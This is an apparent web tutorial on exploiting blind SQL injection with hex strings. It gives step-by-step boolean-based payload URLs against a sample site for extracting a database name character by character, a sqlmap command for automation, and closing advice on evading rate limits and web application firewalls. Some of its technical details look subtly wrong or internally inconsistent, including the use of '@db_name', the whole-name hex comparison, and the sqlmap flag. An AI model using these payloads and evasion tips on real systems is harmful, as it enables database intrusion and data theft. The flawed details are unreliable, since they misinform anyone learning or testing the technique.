Blind SQL Injection: Hex String Execution

TL;DR

This guide shows how to exploit a blind SQL injection vulnerability where you can inject a hex string into the query. We’ll use this to extract data character by character, even if you don’t see error messages or direct results.

Understanding the Problem

Blind SQL injection means the web application doesn’t show you the results of your injected queries directly. Instead, you infer information based on the application’s response – usually whether a page loads differently (true/false). In this case, we can inject a hex string that gets interpreted as part of the SQL query.

Solution

1. Identify the Injection Point: First, find a URL parameter or form field where you suspect an injection vulnerability. Try adding single quotes (‘) to see if it causes an error (if visible) or changes the application’s behaviour.

   http://example.com/page?id=1'

2. Confirm Blind Injection: If you don’t get a direct error, test for blind injection using boolean-based techniques. For example:

   http://example.com/page?id=1 AND 1=1

   (Should behave normally)

   http://example.com/page?id=1 AND 1=2

   (Should behave differently – page not found, different content, etc.)

3. Determine the Hex Injection Method: The specific method depends on how the application handles the hex string. Common methods include:
   • HEX() function: Some databases have a built-in HEX() function to convert strings to their hexadecimal representation.
   • Direct Hex Input: The application might directly interpret the hex string as characters.
4. Extracting Data Character by Character (Using HEX()): This is a common technique. We’ll extract the length of the database name first, then each character.
   1. Find Database Length: Use a loop to determine the length of the database name. Assume the database name is stored in a variable called @db_name.

      http://example.com/page?id=1 AND LENGTH(@db_name) = 1

      Increment the number (1, 2, 3…) until the response changes, indicating you’ve found the correct length.

   2. Extract Each Character: Once you know the length, extract each character using its ASCII value and the HEX() function. For example, to get the first character:

      http://example.com/page?id=1 AND SUBSTRING(@db_name, 1, 1) = 'a'

      (Replace ‘a’ with different characters until you find a match.)

   3. Convert ASCII to Character: If the application returns true when the character matches its ASCII value:

      http://example.com/page?id=1 AND ASCII(SUBSTRING(@db_name, 1, 1)) = 97

      (97 is the ASCII code for ‘a’).

5. Extracting Data Character by Character (Direct Hex Input): If the application directly interprets hex strings:
   1. Convert Characters to Hex: Convert each character you want to extract into its hexadecimal representation. For example, ‘a’ is 0x61.
   2. Inject Hex String: Inject the hex string into the query. The exact syntax depends on the database system. For MySQL:

      http://example.com/page?id=1 AND @db_name = 0x61

      (Replace 0x61 with the hex representation of each character).

6. Automate the Process: Manually testing each character is slow. Use a tool like Burp Suite or SQLMap to automate the process.
   • Burp Suite Intruder: Configure Intruder to iterate through ASCII characters and inject them into the query.
   • SQLMap: SQLMap can automatically detect and exploit blind SQL injection vulnerabilities, including hex string execution. Use the --hex-char option if needed.

     sqlmap -u "http://example.com/page?id=1" --dbs --hex-char

Important Considerations

• Database System: The specific SQL syntax (e.g., HEX(), SUBSTRING(), ASCII()) varies between database systems (MySQL, PostgreSQL, MSSQL, etc.).
• Error Handling: Pay attention to how the application handles errors or unexpected input. This can provide clues about the injection method.
• Rate Limiting and WAFs: Be aware of rate limiting and web application firewalls (WAFs) that might block your requests. Slow down your attacks and try different encoding techniques to bypass these protections.